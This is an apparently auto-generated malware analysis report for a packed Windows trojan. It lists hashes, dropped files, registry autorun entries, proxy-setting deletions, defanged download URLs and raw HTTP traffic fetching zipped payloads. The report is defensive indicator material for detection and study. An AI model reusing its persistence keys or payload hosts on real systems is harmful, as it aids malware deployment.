Gen.Trojan.Heur.BWbrDFZ6chbh_bc5ae6bb52

by malwarelabrobot on November 27th, 2016 in Malware Descriptions.

Trojan.Win32.Inject.acakz (Kaspersky), Gen:Trojan.Heur.@BWbrDFZ6chbh (B) (Emsisoft), Gen:Trojan.Heur.@BWbrDFZ6chbh (AdAware), Trojan.Win32.Swrort.3.FD, GenericPhysicalDrive0.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: bc5ae6bb52956d8da7f7af3cdbf14683
SHA1: f538ce86b89702f9b778ee76607177bd7b802d2c
SHA256: a61a9d0ba14890b9459b2e9a2869d63ffdcbe2ce931fe45c9ef94a8eed692be0
SSDeep: 98304:A9hVm8Tf4RCjIW/qfUEoviVbwEEMweSgdpGJpuand026lf3SjhOyi:AX08TfkCjb/PxLEhyLph36lfSYyi
Size: 4839936 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: ASPackv212, UPolyXv05_v6
Company: no certificate found
Created at: 2016-09-16 19:40:46
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

wbmoney.exe:1256
wbmoney.exe:2052
wbmoney.exe:3752
wbmoney.exe:3460
%original file name%.exe:2604
setmss.exe:644
setmss.exe:3440
LLVier.exe:472
LLVier.exe:1612
LLVier.exe:3352

The Trojan injects its code into the following process(es):

setmss.exe:3368

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process wbmoney.exe:3752 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012016112620161127\index.dat (16 bytes)
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F5BEJ4YJ\flowtips[1].htm (2862 bytes)

The process %original file name%.exe:2604 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Fonts\win\LLVier.exe (424 bytes)
C:\Windows\wbmoney.exe (614 bytes)
C:\Windows\LLViewer.exe (2 bytes)
C:\Windows\Fonts\win\setmss.exe (2 bytes)
C:\Windows\updatezb.exe (196 bytes)
C:\Windows\Fonts\win\TTHB.bat (5 bytes)
C:\Windows\TbViewer.exe (3 bytes)
C:\Windows\Config.ini (155 bytes)
C:\ .bat (113 bytes)
C:\Windows\Fonts\win\TB.bat (223 bytes)
C:\Windows\Alexa.dll (1 bytes)

The process setmss.exe:3368 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\1_0_ttbrowser.exe[1].zip (1133516 bytes)
C:\Windows\Fonts\win\1_0_ttbrowser.exe.zip (950255 bytes)
C:\Windows\Fonts\win\update.txt (166 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ttll\vest3368\Cookies\index.dat (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\update_stworker[1].txt (166 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ttll\vest3368\Cookies\R2QLPNUL.txt (116 bytes)

The Trojan deletes the following file(s):

C:\Windows\Fonts\win\update.txt (0 bytes)

The process setmss.exe:644 makes changes in the file system.
The Trojan deletes the following file(s):

C:\Windows\System32\config\systemprofile\AppData\Local\ttll\vest644\Cookies (0 bytes)
C:\Windows\System32\config\systemprofile\AppData\Local\ttll\vest644\Cache (0 bytes)
C:\Windows\System32\config\systemprofile\AppData\Local\ttll\vest644 (0 bytes)
C:\Windows\System32\config\systemprofile\AppData\Local\ttll\vest644\History (0 bytes)

The process setmss.exe:3440 makes changes in the file system.
The Trojan deletes the following file(s):

C:\Windows\System32\config\systemprofile\AppData\Local\ttll\vest3440 (0 bytes)
C:\Windows\System32\config\systemprofile\AppData\Local\ttll\vest3440\Cookies (0 bytes)
C:\Windows\System32\config\systemprofile\AppData\Local\ttll\vest3440\History (0 bytes)
C:\Windows\System32\config\systemprofile\AppData\Local\ttll\vest3440\Cache (0 bytes)

The process LLVier.exe:3352 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Fonts\win\browser\QtCore4.dll (77238 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\1_0_QtGui4.dll[1].zip (264629 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XDZVB81J.txt (113 bytes)
C:\Windows\Fonts\win\1_0_browser.exe.zip (29536 bytes)
C:\Windows\Fonts\win\LLVier.exe (15168 bytes)
C:\Windows\Fonts\win\1_0_QtGui4.dll.zip (227889 bytes)
C:\Windows\Fonts\win\browser\browser.exe (10136 bytes)
C:\Windows\Fonts\win\update.txt (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\1_0_browser.exe[1].zip (35992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\1_0_海马流量.exe[1].zip (48658 bytes)
C:\Windows\Fonts\win\1_0_海马流量.exe.zip (44168 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\1_0_QtCore4.dll[1].zip (254212 bytes)
C:\Windows\Fonts\win\1_0_QtCore4.dll.zip (210446 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\update_hmflower[1].txt (609 bytes)

The Trojan deletes the following file(s):

C:\Windows\Fonts\win\1_0_browser.exe.zip (0 bytes)
C:\Windows\Fonts\win\update.txt (0 bytes)
C:\Windows\Fonts\win\1_0_QtCore4.dll.zip (0 bytes)
C:\Windows\Fonts\win\1_0_海马流量.exe.zip (0 bytes)

Registry activity

The process wbmoney.exe:1256 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\llzb]
"LastTime" = "1480156603"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 03 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\wbmoney_RASAPI32]
"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 03 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\wbmoney_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\wbmoney_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\wbmoney_RASAPI32]
"FileTracingMask" = "4294901760"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\wbmoney_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\wbmoney_RASAPI32]
"MaxFileSize" = "1048576"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\wbmoney_RASMANCS]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\wbmoney_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\wbmoney_RASMANCS]
"ConsoleTracingMask" = "4294901760"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process wbmoney.exe:2052 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached]
"{474C98EE-CF3D-41F5-80E3-4AAB0AB04301} {000214E4-0000-0000-C000-000000000046} 0xFFFF" = "01 00 00 00 00 00 00 00 30 D1 72 FA D0 47 D2 01"
"{1D27F844-3A1F-4410-85AC-14651078412D} {000214E4-0000-0000-C000-000000000046} 0xFFFF" = "01 00 00 00 00 00 00 00 FA BF C3 FA D0 47 D2 01"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage]
"StartMenu_Start_Time" = "51 F5 79 FA D0 47 D2 01"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached]
"{596AB062-B4D2-4215-9F74-E9109B0A8153} {000214E4-0000-0000-C000-000000000046} 0xFFFF" = "01 00 00 00 00 00 00 00 0D A2 58 FA D0 47 D2 01"
"{23170F69-40C1-278A-1000-000100020000} {000214E4-0000-0000-C000-000000000046} 0xFFFF" = "01 00 00 00 00 00 00 00 78 3A BA FA D0 47 D2 01"
"{7B4A83B6-F704-4B77-8E3D-C6087E3A21D2} {BDDACB60-7657-47AE-8445-D23E1ACF82AE} 0xFFFF" = "01 00 00 00 00 00 00 00 B1 56 7C FA D0 47 D2 01"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached]
"{85BBD920-42A0-1069-A2E4-08002B30309D} {000214E4-0000-0000-C000-000000000046} 0xFFFF" = "01 00 00 00 00 00 00 00 12 B8 7E FA D0 47 D2 01"
"{F81E9010-6EA4-11CE-A7FF-00AA003CA9F6} {000214E4-0000-0000-C000-000000000046} 0xFFFF" = "01 00 00 00 00 00 00 00 B1 56 7C FA D0 47 D2 01"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

The process wbmoney.exe:3752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Microsoft\Internet Explorer\IETld]
"IETldDllVersionLow" = "531644475"
"StaleIETldCache" = "1"

[HKU\.DEFAULT\Software\Local AppWizard-Generated Applications\?????????\Setting]
"lastrun" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows Script\Settings]
"JITDebug" = "0"

[HKU\.DEFAULT\Software\Microsoft\Internet Explorer\International\CpMRU]
"InitHits" = "100"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016112620161127]
"CacheLimit" = "8192"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 04 00 00 00 09 00 00 00 00 00 00 00"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016112620161127]
"CacheRepair" = "0"
"CachePrefix" = ":2016112620161127:"
"CachePath" = "%USERPROFILE%\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012016112620161127"

[HKU\.DEFAULT\Software\Microsoft\Internet Explorer\IETld]
"IETldVersionHigh" = "1"

[HKU\.DEFAULT\Software\llzb]
"LastTime" = "1480156616"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached]
"{FF393560-C2A7-11CF-BFF4-444553540000} {000214E6-0000-0000-C000-000000000046} 0xFFFF" = "01 00 00 00 00 00 00 00 03 77 07 07 D1 47 D2 01"

[HKU\.DEFAULT\Software\Microsoft\Internet Explorer\IETld]
"IETldDllVersionHigh" = "589824"

[HKU\.DEFAULT\Software\Microsoft\Internet Explorer\International\CpMRU]
"Size" = "10"

[HKU\.DEFAULT\Software\Microsoft\Internet Explorer\IETld]
"IETldVersionLow" = "7"

[HKU\.DEFAULT\Software\Microsoft\Internet Explorer\International\CpMRU]
"Enable" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016112620161127]
"CacheOptions" = "11"

[HKU\.DEFAULT\Software\Local AppWizard-Generated Applications\?????????\Setting]
"UsrID" = "732196"

[HKU\.DEFAULT\Software\Microsoft\Internet Explorer\International\CpMRU]
"Factor" = "20"

[HKU\.DEFAULT\Software\Microsoft\Internet Explorer\BrowserEmulation]
"TLDUpdates" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process wbmoney.exe:3460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
"AutoDetect" = "1"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

The process setmss.exe:3368 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\setmss_RASMANCS]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\setmss_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\setmss_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\setmss_RASAPI32]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\setmss_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\setmss_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\setmss_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\setmss_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\setmss_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\setmss_RASMANCS]
"MaxFileSize" = "1048576"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"SEOWorker2014" = "C:\Windows\Fonts\win\setmss.exe -autorun"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process setmss.exe:644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"SEOWorker2014" = "C:\Windows\Fonts\win\setmss.exe -autorun"

The Trojan deletes the following registry key(s):

[HKU\.DEFAULT\Software\应用程序向导生成的本地应用程序\???\Recent File List]

The process setmss.exe:3440 makes changes in the system registry.
The Trojan deletes the following registry key(s):

[HKU\.DEFAULT\Software\应用程序向导生成的本地应用程序\???\Recent File List]

The process LLVier.exe:472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"HMFlower2016" = "C:\Windows\Fonts\win\LLVier.exe -autorun"

The Trojan deletes the following registry key(s):

[HKU\.DEFAULT\Software\Local AppWizard-Generated Applications\???\Recent File List]

The process LLVier.exe:1612 makes changes in the system registry.
The Trojan deletes the following registry key(s):

[HKU\.DEFAULT\Software\HaiMaSoft\???\Recent File List]

The process LLVier.exe:3352 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\LLVier_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\LLVier_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\LLVier_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3D 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\LLVier_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\LLVier_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\LLVier_RASMANCS]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\LLVier_RASAPI32]
"EnableFileTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"HMFlower2016" = "C:\Windows\Fonts\win\LLVier.exe -autorun"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
8e7bd91d38f74838ddf3fdc932bb67d8 c:\Windows\Alexa.dll
39a519de3f5d824966ae51c452e2d0f7 c:\Windows\Fonts\win\LLVier.exe
d4a718339826e836077e7d46e790f895 c:\Windows\Fonts\win\LLVier.exe_old
7f86a6c833d09acf5f681ef2aec902b6 c:\Windows\Fonts\win\browser\QtCore4.dll
13fc3079a60615c32792cbe8b8d38820 c:\Windows\Fonts\win\browser\browser.exe
78eda5ae7b7d6c88b17415fa378d1bfc c:\Windows\Fonts\win\setmss.exe
f574408a95b8bef65412d96c32575832 c:\Windows\LLViewer.exe
a97e137802824c087ab2a52893619d87 c:\Windows\TbViewer.exe
933d9e76c590186a5de57078f3bde3ba c:\Windows\updatezb.exe
b170aa625308855b47e1b00e58c6d6dd c:\Windows\wbmoney.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 532480 248832 5.54437 a736b57c1d502a18202672ba991bda28
.rdata 536576 10891264 4456448 5.54511 7350b4ae66c794f46bad78419a7d39fe
.data 11427840 204800 21504 5.52535 887623fa5beffe649429062dd30dccad
.rsrc 11632640 118784 8704 4.42904 d2ef483b5494f9b07aace8585ede230f
.aspack 11751424 106496 103424 5.11117 f9ecfa7432e4e2ceed168e8ec3076ee5
.adata 11857920 4096 0 0 d41d8cd98f00b204e9800998ecf8427e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://update.ttliuliang.com/update/107872/update/update_stworker.txt?rnd=1480156597 162.159.227.238
hxxp://update.haimarj.com/update/100006/update/update_hmflower.txt?rnd=1480156601 162.159.208.75
hxxp://update.haimarj.com/update/100006/update/1_0_272243302355301367301277.exe.zip?rnd=1480156602 162.159.208.75
hxxp://update.ttliuliang.com/update/107872/update/1_0_ttbrowser.exe.zip?rnd=1480156603 162.159.227.238
hxxp://update.haimarj.com/update/100006/update/1_0_browser.exe.zip?rnd=1480156609 162.159.208.75
hxxp://down.9935.org/gj/ver.txt 222.187.253.99
hxxp://www.4345.cc/rj/flowtips.html 125.77.197.140
hxxp://update.haimarj.com/update/100006/update/1_0_QtCore4.dll.zip?rnd=1480156620 162.159.208.75
hxxp://yd.ecoma.ourwebpic.com/
hxxp://cdn.sp.cdntip.com/ic.asp
hxxp://update.haimarj.com/update/100006/update/1_0_QtGui4.dll.zip?rnd=1480156636 162.159.208.75
hxxp://6688.9935.org/ClientAPI/flowtaskAPIV1.aspx?ran=180620906 115.159.33.110
hxxp://x1.2466.cc/ClientAPI/StatisticsUserAPI.aspx?ran=1763564114 222.76.214.142
hxxp://www.ip138.com/ 87.245.198.83
hxxp://1212.ip138.com/ic.asp 1.31.173.43
hxxp://update.haimarj.com/update/100006/update/1_0_.........exe.zip?rnd=1480156602 162.159.208.75


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /ic.asp HTTP/1.1
Accept: */*
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 1212.ip138.com


HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Connection: keep-alive
Date: Sat, 26 Nov 2016 10:37:15 GMT
Content-Type: text/html
Content-Length: 219
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCQQQQQRR=DBJOPAHDAIGIONEPBEIBLFPD; path=/
X-Daa-Tunnel: hop_count=1



GET /ic.asp HTTP/1.1

Accept: */*
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 1212.ip138.com
Cookie: ASPSESSIONIDCQQQQQRR=DBJOPAHDAIGIONEPBEIBLFPD


HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Connection: keep-alive
Date: Sat, 26 Nov 2016 10:37:30 GMT
Content-Type: text/html
Content-Length: 219
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDSAQBBBQD=CNGHNNEBMCPGBIKNNHHLNDFH; path=/
X-Daa-Tunnel: hop_count=1


GET /update/100006/update/update_hmflower.txt?rnd=1480156601 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: update.haimarj.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 26 Nov 2016 10:36:42 GMT
Content-Type: text/plain
Content-Length: 1298
Connection: keep-alive
Set-Cookie: __cfduid=d387a695a86ee3c45fcb2926575c1c5941480156602; expires=Sun, 26-Nov-17 10:36:42 GMT; path=/; domain=.haimarj.com; HttpOnly
Content-Encoding: gzip
Last-Modified: Wed, 14 Sep 2016 14:17:06 GMT
Accept-Ranges: bytes
ETag: "3c9d36ac92ed21:0"
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 307cb36c67c84efc-DME

GET /update/100006/update/1_0_.........exe.zip?rnd=1480156602 HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: update.haimarj.com
Connection: Keep-Alive
Cookie: __cfduid=d387a695a86ee3c45fcb2926575c1c5941480156602


HTTP/1.1 200 OK
Date: Sat, 26 Nov 2016 10:36:43 GMT
Content-Type: application/x-zip-compressed
Content-Length: 190036
Connection: keep-alive
Last-Modified: Sun, 11 Sep 2016 11:57:00 GMT
Accept-Ranges: bytes
ETag: "7ddc889a23cd21:0"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 307cb37124444efc-DME

GET /update/100006/update/1_0_browser.exe.zip?rnd=1480156609 HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: update.haimarj.com
Connection: Keep-Alive
Cookie: __cfduid=d387a695a86ee3c45fcb2926575c1c5941480156602


HTTP/1.1 200 OK
Date: Sat, 26 Nov 2016 10:36:50 GMT
Content-Type: application/x-zip-compressed
Content-Length: 110556
Connection: keep-alive
Last-Modified: Wed, 14 Sep 2016 14:15:44 GMT
Accept-Ranges: bytes
ETag: "e816497b92ed21:0"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 307cb39ba44d4efc-DME

GET /update/100006/update/1_0_QtCore4.dll.zip?rnd=1480156620 HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: update.haimarj.com
Connection: Keep-Alive
Cookie: __cfduid=d387a695a86ee3c45fcb2926575c1c5941480156602


HTTP/1.1 200 OK
Date: Sat, 26 Nov 2016 10:37:00 GMT
Content-Type: application/x-zip-compressed
Content-Length: 1047128
Connection: keep-alive
Last-Modified: Sun, 05 Jun 2016 13:30:50 GMT
Accept-Ranges: bytes
ETag: "1e4ecb792ebfd11:0"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 307cb3ded3cc4efc-DME

GET /update/100006/update/1_0_QtGui4.dll.zip?rnd=1480156636 HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: update.haimarj.com
Connection: Keep-Alive
Cookie: __cfduid=d387a695a86ee3c45fcb2926575c1c5941480156602


HTTP/1.1 200 OK
Date: Sat, 26 Nov 2016 10:37:16 GMT
Content-Type: application/x-zip-compressed
Content-Length: 3716649
Connection: keep-alive
Last-Modified: Sun, 05 Jun 2016 13:30:51 GMT
Accept-Ranges: bytes
ETag: "89147d7a2ebfd11:0"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
